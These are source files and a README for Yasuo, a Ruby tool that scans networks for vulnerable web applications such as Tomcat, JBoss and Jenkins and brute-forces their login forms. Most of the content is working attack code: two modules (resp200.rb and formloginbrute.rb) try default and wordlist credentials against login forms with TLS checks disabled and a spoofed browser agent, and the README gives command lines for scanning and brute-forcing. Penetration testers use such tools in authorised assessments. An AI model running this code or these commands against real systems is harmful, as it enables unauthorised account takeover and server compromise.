README.md
#YASUO [@0xsauby]

[![AUR](https://img.shields.io/aur/license/yaourt.svg?maxAge=2592000)](http://www.fsf.org/licensing/)
[![ToolsWatch 2016 Arsenal](https://www.toolswatch.org/badges/arsenal/2016.svg)](https://www.blackhat.com/eu-16/arsenal.html)
[![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social&maxAge=2592000)](https://twitter.com/0xsauby)

##Description

Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.

While working on a network security assessment (internal, external, redteam
gigs etc.), we often come across vulnerable 3rd-party web applications or web
front-ends that allow us to compromise the remote server by exploiting publicly
known vulnerabilities. Some of the common & favorite applications are Apache
Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on.

If you search through Exploit-db, there are over 10,000 remotely exploitable
vulnerabilities that exist in tons of web applications/front-ends and could
allow an attacker to completely compromise the back-end server. These
vulnerabilities range from RCE to malicious file uploads to SQL injection to
RFI/LFI etc.

Yasuo is built to quickly scan the network for such vulnerable applications
thus serving pwnable targets on a silver platter.

##Setup / Install
You would need to install the following gems:

- gem install ruby-nmap net-http-persistent mechanize text-table sqlite3

##Details

Yasuo provides following command-line options:

-r :: If you want Yasuo to perform port scan, use this switch to provide an IP address or IP range

-l :: If you want Yasuo to perform port scan, use this switch to provide an input file with new-line separated IP addresses, similar to nmap's -iL option

-s :: Provide custom signature file. [./yasuo.rb -s mysignatures.yaml -f nmap.xml] [Default - signatures.yaml]

-f :: If you do not want Yasuo to perform port scan and already have an nmap output in xml format, use this switch to feed the nmap output

-u :: Takes a newline-separated file of URLs saved from previous run of Yasuo. See below for more details.

-n :: Tells Yasuo to not ping the host while performing the port scan. Standard nmap option.

-p :: Use this switch to provide port number(s)/range

-A :: Use this switch to scan all the 65535 ports. Standard nmap option.

-b [all/form/basic] :: If the discovered application implements authentication, use this switch to brute-force the auth. "all" will brute-force both form & http basic auth. "form" will only brute-force form-based auth. "basic" will only brute-force http basic auth.

-t :: Specify maximum number of threads

-h :: Well, take a guess

##What is this new switch: --usesavedstate (-u)

When Yasuo runs, it performs several steps before starting to enumerate vulnerable applications. If you provide an IP address or range, it will perform a port scan against the provided targets. If you provide Yasuo with nmap xml output file, it will parse that file and enumerate hosts with open web ports. It then sends a request for a fake (non-existent) file and directory to each enumerated host:ip. To reduce false-positives, it discards all ip:port that respond back with HTTP 200 Ok for the fake file & directory requests. At the end of this whole process, we get a list of, let's say, "good urls". These good urls are then used to enumerate vulnerable applications.

If for some reason, you have to re-run Yasuo against the same set of targets, the previous versions of Yasuo will go through this whole process again. That's not efficient at all. I know, I am mostly dumb and a slow learner but I am constantly evolving. Anyways, a good reason to re-run Yasuo against the same targets could be to use a different (or custom) signatures file.

This latest version of Yasuo will automatically save a file, savedURLstateXXXXX.out, in the same folder it runs from. This file will contain all the "good urls". If you plan to re-run Yasuo on the same targets, just feed this file to Yasuo without the -f or -r options.

`Example: ruby yasuo.rb -s my_custom_signatures.yaml -u savedURLstateXXXXX.out`

Yasuo will parse this file and start enumerating vulnerable applications against the listed "good urls". Ta-Da.

##Examples

`./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form`

The above command will perform port scan against 127.0.0.1 on ports 80, 8080,
443 and 8443 and will brute-force login for all the applications that implement
form-based authentication.


`./yasuo -l /project/hosts -p 80,8080,443,8443`

The above command will perform port scan against the hosts in file /projetcs/hosts 
on ports 80, 8080, 443 and 8443 and will not perform any brute-force actions against
the applications dicovered.


`./yasuo -f my_nmap_output.xml -b all`

The above command will parse the nmap output file "my_nmap_output.xml" and will
brute-force login for all the applications that implement form-based and http
basic authentication.


##Tetris-style Program Flow

![Alt text](./tetris-style-program-flow.JPG)


changelog.txt
Changelog:

version 2.3
-----------

1) Accepts file with new-line separated list of IP addresses with "-l" switch.
2) Smart brute-forcing. Introduced app-specific credentials in the signature file, which are tried first.
3) Sqlite database integration. Yasuo output is now stored in a sqlite database.
4) All output and log files are now saved in "logs" directory.
5) And man there were bugs. Fixed now.

resp200.rb
require "colorize"
require "mechanize"
require "net/http"
require "net/https"
require "nokogiri"
require "uri"


# A simple wrapper around Mechanize to help automate brute forcing a login
# form on a webpage.
module LoginFormBruteForcer

  module_function

  # Returns an enumeration of usernames and passwords pulled from the supplied
  # text files. (Each line in the given files is expected to be a username
  # or password)
  def usernames_and_passwords(users_file="users.txt", password_file="pass.txt")
    Enumerator.new do |enum|
      File.open(users_file, "r").each do |user|
        File.open(password_file, "r").each do |password|
          enum.yield user, password
        end
      end
    end
  end

  # Attempts to bruteforce a login to supplied url.
  def brute_by_force(url)
    login_agent = Mechanize.new { |agent| agent.user_agent_alias = 'Mac Safari' }
    login_agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
    login_agent.follow_meta_refresh = true

    login_form = login_agent.get(url).form(:name => /login/)

    # login_form could be nil in case of an exception or if the login form does
    # not exist. The checks in Yasuo.rb are weak.
    if not login_form
      puts "Login page not found. Looks like this instance maybe unauthenticated".green
      return "", ""
    end

    username_field = login_form.field_with(name: /user|email|login|REGEMAIL|name/i)
    password_field = login_form.field_with(name: /pass|pwd|REGCODE/i)

    usernames_and_passwords.each do |user, pass|
      username = user.chomp
      password = pass.chomp
      username_field.value = username
      password_field.value = password

      begin
        puts "Trying combination --> #{username}/#{password}" # saurabh: comment this for less verbose output

        login_request = login_form.submit

        sleep 0.5  # ramanan: why?

        # we determine if we have logged in by looking to see if we are on
        # a page with the login form.
        if (login_request.body.scan(/"#{login_form.name}"/i).empty? and
            login_request.body.scan(/"#{username_field.name}"/i).empty? and
            login_request.body.scan(/"#{username_field.name}"/i).empty?)
          puts "Yatta, found default login credentials for #{url} - #{username} / #{password}\n".green
          return username, password
        end
      rescue Mechanize::ResponseCodeError => exception
        if (exception.response_code != '200' or
            exception.response_code != '301' or
            exception.response_code != '302')
          # These response codes are handled by Mechanize
          login_request = exception.page
          puts "Invalid credentials or user does not have sufficient privileges".red
        else
          puts "Unknown server error".red
        end
      end
    end

    puts "Could not find default login credentials, sucks".red
    return "Not Found", "Not Found"
  end
end



formloginbrute.rb
require "mechanize"
require "net/http"
require "net/https"
require "nokogiri"
require "uri"


# A simple wrapper around Mechanize to help automate brute forcing a login
# form on a webpage.
module LoginFormBruteForcer

  module_function

  # Returns an enumeration of usernames and passwords pulled from the supplied
  # text files. (Each line in the given files is expected to be a username
  # or password)
  def usernames_and_passwords(users_file="users.txt", password_file="pass.txt")
    Enumerator.new do |enum|
      File.open(users_file, "r").each do |user|
        File.open(password_file, "r").each do |password|
          enum.yield user, password
        end
      end
    end
  end

  # Attempts to bruteforce a login to supplied url.
  def brute_by_force(url,dcreds)
    login_agent = Mechanize.new { |agent| agent.user_agent_alias = 'Mac Safari' }
    login_agent.verify_mode = OpenSSL::SSL::VERIFY_NONE
    login_agent.follow_meta_refresh = true
    #login_agent.set_proxy("localhost", 8080)    #To send login request through a proxy. Mostly for debugging.

    login_form = login_agent.get(url).form(:name => /login/)

    # login_form could be nil in case of an exception or if the login form does
    # not exist. The checks in Yasuo.rb are weak.
    if not login_form
      $logboth.info("Login page not found. Looks like this instance maybe unauthenticated")
      return "<None>", "<None>"
    end

    username_field = login_form.field_with(name: /user|email|login|REGEMAIL|name/i)
    password_field = login_form.field_with(name: /pass|pwd|REGCODE/i)
    if not username_field
      $logboth.warn ("[+] Could not enumerate the username field, moving on. You should check it manually")
      puts ("[+] Could not enumerate the username field, moving on. You should check it manually").red
      username = "<Check Manually>"
      password = "<Check Manually>"
      return username, password
    end

    #Smart brute-force code starts here
    username = dcreds.split(':')[0].chomp
    password = dcreds.split(':')[1].chomp
    username_field.value = username
    password_field.value = password

    begin
      $logfile.info("Trying app-specific default creds first -> #{dcreds}")
      puts ("[+] Trying app-specific default creds first -> #{dcreds}\n").green

      login_request = login_form.submit
      #puts login_request.body   #To print server response. Mostly for debugging.

      sleep 0.5

      # we determine if we have logged in by looking to see if we are on
      # a page with the login form.
      if (!login_request.form_with(:name => 'login') and
          login_request.body.scan(/"#{username_field.name}"/i).empty? and
          login_request.body.scan(/"#{username_field.name}"/i).empty?)
        puts "[+] Yatta, found default login credentials for #{url} - #{username}:#{password}\n".green
        $logfile.info("[+] Yatta, found default login credentials for #{url} - #{username} / #{password}")
        return username, password
      end
    rescue Mechanize::ResponseCodeError => exception
      if (exception.response_code != '200' or
          exception.response_code != '301' or
          exception.response_code != '302')
        # These response codes are handled by Mechanize
        login_request = exception.page
        $logfile.warn("Invalid credentials or user does not have sufficient privileges")
      else
        $logboth.info("Unknown server error")
      end
    end
    #Smart brute-force code ends here    

    usernames_and_passwords.each do |user, pass|
      username = user.chomp
      password = pass.chomp

      username_field.value = username
      password_field.value = password

      begin
        $logfile.info("Trying combination --> #{username}/#{password}")

        login_request = login_form.submit

        sleep 0.5

        # we determine if we have logged in by looking to see if we are on
        # a page with the login form.
        if (!login_request.form_with(:name => 'login') and
            login_request.body.scan(/"#{username_field.name}"/i).empty? and
            login_request.body.scan(/"#{username_field.name}"/i).empty?)
          puts "[+] Yatta, found default login credentials for #{url} - #{username} / #{password}\n".green
          $logfile.info("[+] Yatta, found default login credentials for #{url} - #{username} / #{password}")
          return username, password
        end
      rescue Mechanize::ResponseCodeError => exception
        if (exception.response_code != '200' or
            exception.response_code != '301' or
            exception.response_code != '302')
          # These response codes are handled by Mechanize
          login_request = exception.page
          $logfile.warn("Invalid credentials or user does not have sufficient privileges")
        else
          $logboth.info("Unknown server error")
        end
      end
    end

    $logfile.info("Could not find default credentials, sucks")
    puts "Could not find default login credentials, sucks".red
    return "Not Found", "Not Found"
  end
end